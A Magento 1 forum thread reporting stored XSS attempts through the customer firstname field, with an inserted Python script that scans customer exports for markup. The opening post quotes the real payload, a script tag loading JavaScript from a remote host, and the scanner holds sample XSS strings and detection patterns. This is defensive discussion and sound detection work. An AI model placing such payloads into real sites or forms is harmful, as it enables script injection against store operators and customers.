Hacking Attempts
Had a new one today whereby the attacker uses the firstname field to put a link in to some remote javascript.
When you go to delete the account on a fully patched store, you are prevented from doing so by an invalid form key being returned, and the account must be deleted from the Manage Customer Grid.
<script src=//zs.mk/i></script>
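Added example, not part of the original post and not Magento code: a triage script that scans an exported customer list for name fields carrying markup like the payload above, including HTML-entity and URL-encoded variants. The CSV column names (`email`, `firstname`, `lastname`), the rule names and the sample rows are assumptions constructed for illustration.

```python
import csv
import html
import io
import re
from urllib.parse import unquote

# Name fields should never contain markup; these patterns flag values that do.
SUSPICIOUS = [
    ("script-tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("html-tag", re.compile(r"<\s*[a-z!/][^>]*>", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("remote-src", re.compile(r"\b(?:src|href)\s*=\s*[\"']?(?:https?:)?//", re.I)),
    ("js-uri", re.compile(r"javascript\s*:", re.I)),
]

def normalize(value):
    """Undo URL and HTML-entity encoding (two passes) so encoded payloads match too."""
    for _ in range(2):
        value = html.unescape(unquote(value))
    return value

def findings(value):
    """Return the names of all rules that match the decoded value."""
    text = normalize(value)
    return [name for name, rx in SUSPICIOUS if rx.search(text)]

def scan_customers(csv_text, fields=("firstname", "lastname")):
    """Return (email, field, [rule names]) for every name field holding markup."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for field in fields:
            matched = findings(row.get(field) or "")
            if matched:
                hits.append((row.get("email", ""), field, matched))
    return hits

# Constructed sample export (column names are assumptions, not Magento's format).
SAMPLE = """email,firstname,lastname
alice@example.test,Alice,O'Neil
bob@example.test,<script src=//cdn.example.test/i></script>,Smith
carol@example.test,&lt;img src=x onerror=alert(1)&gt;,Jones
dave@example.test,Jean-Luc,D'Arcy <3
"""

if __name__ == "__main__":
    for email, field, rules in scan_customers(SAMPLE):
        print(email, field, ",".join(rules))
```

Flagged accounts are candidates for review and removal; the scan does not replace escaping customer names wherever they are rendered.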
Re: Hacking Attempts
Hi,
Which version of Magento 1 are you using? Do you have all patches applied?
Anna from E-CONOMIX
Re: Hacking Attempts
Had this same issue. For whatever reason the payment failed and the order was not created. Will follow up if it happens. We are fully patched on Magento 1.9 latest version.
Re: Hacking Attempts
We just had the same exact hack on a customer site. We were fully patched up to the latest version. Does anyone have any information about this hack? There seems to be some vulnerability in Magento.
Re: Hacking Attempts
Yes, I've heard a lot about that lately. Can someone tell me more about it? I would like to prevent an attempt to steal my personal information.
Re: Hacking Attempts
I am really sorry, I don't know why my message posted two times(
Re: Hacking Attempts
It's always good to be aware of the different ways that hackers can try to gain access to our data. In this case, it sounds like the attacker was trying to inject a malicious script into your store through the first name field. Luckily, you could prevent the attack by deleting the account from the Manage Customer Grid.
Re: Hacking Attempts
We take the security of our platform very seriously. It's concerning to hear about the new hacking attempt utilizing the firstname field to inject remote JavaScript. We appreciate you sharing this information, and our security team is actively investigating and working on implementing measures to address and prevent such attempts. In the meantime, if you encounter difficulties in deleting accounts due to invalid form key issues, please proceed with caution and utilize the Manage Customer Grid for account deletion. Your vigilance and cooperation in reporting security concerns are crucial in maintaining a secure environment for our users, and we encourage you to keep us informed of any further incidents or details related to these hacking attempts.